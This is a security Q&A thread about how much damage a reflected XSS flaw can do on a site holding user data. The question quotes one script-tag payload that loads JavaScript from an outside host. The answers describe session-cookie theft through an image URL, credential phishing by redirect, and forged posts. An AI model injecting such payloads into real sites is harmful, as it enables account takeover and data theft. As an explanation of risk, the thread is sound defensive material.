15

A website I visit allows this kind of attack, to be implemented with GET in the URL

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Along with many others on this page: http://ha.ckers.org/xss.html

The site requires an account (usually paid) to access that page, but still.

How serious of a concern is this? And what kind of damage could be done to the website?

I understand I'm giving you little information, but a general idea would be nice. Thanks!

(Website is operated on a large database with confidential data along with user accounts, addresses, emails and etc [no credit cards]).

Hendrik Brummermann
  • 27,118
  • 6
  • 79
  • 121
jn1kk
  • 259
  • 2
  • 7

3 Answers3

17

Anything you can do with javascript as the site owner can be done with an XSS attack. That includes modifying the DOM. You could replace an entire page and thus have control of all data into and out of the website. Relatively simple scripts can read cookies and forward session information. That would be like Firesheep at a distance -- impersonating a user by grabbing their access credentials.

Further, this may introduce visitors to your site any sort of attack that affects browsers.

Jeff Ferland
  • 38,090
  • 9
  • 93
  • 171
  • I understand the part about cookies and sessions hijacks. But what about modifying the DOM? How does replacing a page get access to any privileged data? All data is coming through a database with (for example) PHP. – jn1kk Oct 21 '11 at 16:12
  • 2
    Anything the user sees on their browser screen is available to be read by an XSS script. If a user can see their address information when logged in, a malicious script can forward that information to another website. – Jeff Ferland Oct 21 '11 at 16:17
  • Does this mean you somehow may be able to plant the script on the website, or the script is able to jump into another user's session (not just steal session data)? – jn1kk Oct 21 '11 at 16:19
  • 7
    Sometimes XSS attacks are from the outside of the site. Those only affect one user (something passed through the URL, for example). When they're really dangerous is when they get embedded into the site. Poor processing of user comments on a discussion page can introduce an XSS attack that affects all users viewing that page. One particularly innovative one mentioned on this site is where somebody placed an XSS attack in the EXIF data of an image and loaded that to website which displayed the EXIF data to users. – Jeff Ferland Oct 21 '11 at 16:29
  • How do XSS attacks affect other users? If it is not stored in a database or by any means at all, then can it affect other users? – Mason H. Hatfield Jan 22 '19 at 04:51
12

XSS alone doesn't do much damage, but it can easily be combined with other techniques to form powerful attack vectors. A few possibilities are:

session hijacking - Often, session cookies can be read from Javascript. Through XSS, a script can be mounted that reads a user's session ID and passes it back to the attacker (a simple yet effective method is to add an img element to the DOM, where the URL of the image carries the session ID); the attacker can then hijack an authenticated session by putting the session ID into their own session cookie.

scraping sensitive information - If a page with an XSS vulnerability contains sensitive information, and send it to the attacker (just like the session cookie).

posting data on someone else's behalf - Through XSS, a form submit can be intercepted and modified, or even triggered, posting data without the user's consent. For example, if you can compromise a web mail client, you could hijack the 'send' button to add yourself to the list of recipients.

malicious redirecting - An XSS script can alter the URLs of any link on the page. This can be abused to, for example, send the user to a spoofed login page; instead of actually logging in, they are sending their credentials to the attacker.

social engineering - By inserting error messages, alerts, etc., you can trick users into all sorts of insecure behavior. For example, an attacker could prompt users to download and open a certain file; if the site that asks them to do so has a high level of trust with the user, chances are they will uncritically execute anything, which allows for mounting trojans and other malware.

Also note that many attack vectors work without the user consciously opening the compromised page: often, the compromised page is put into an invisible iframe somewhere else, such as a forum that the victim is likely to visit, or a page linked from yet somewhere else.

tdammers
  • 1,776
  • 9
  • 14
  • Session hijacking is one I hadn't thought of. That can go totally undetected and opens up the pandora's box of what the hacker can do. – Adam Grant Sep 01 '17 at 15:21
9

There are two aspects:

  • An XSS vulnerability allows the attacker to do anything, the victim is allowed to do with the system. If the victim is a member of the staff, it is likely that he or she has access to personal information such as e-mail addresses or bank details. Furthermore such accounts may be allow to modify content and replaces it with inappropriate statements or browser exploits.

  • A successful hack may result in extremely bad press coverage. This may be far worse than the direct damage.

Hendrik Brummermann
  • 27,118
  • 6
  • 79
  • 121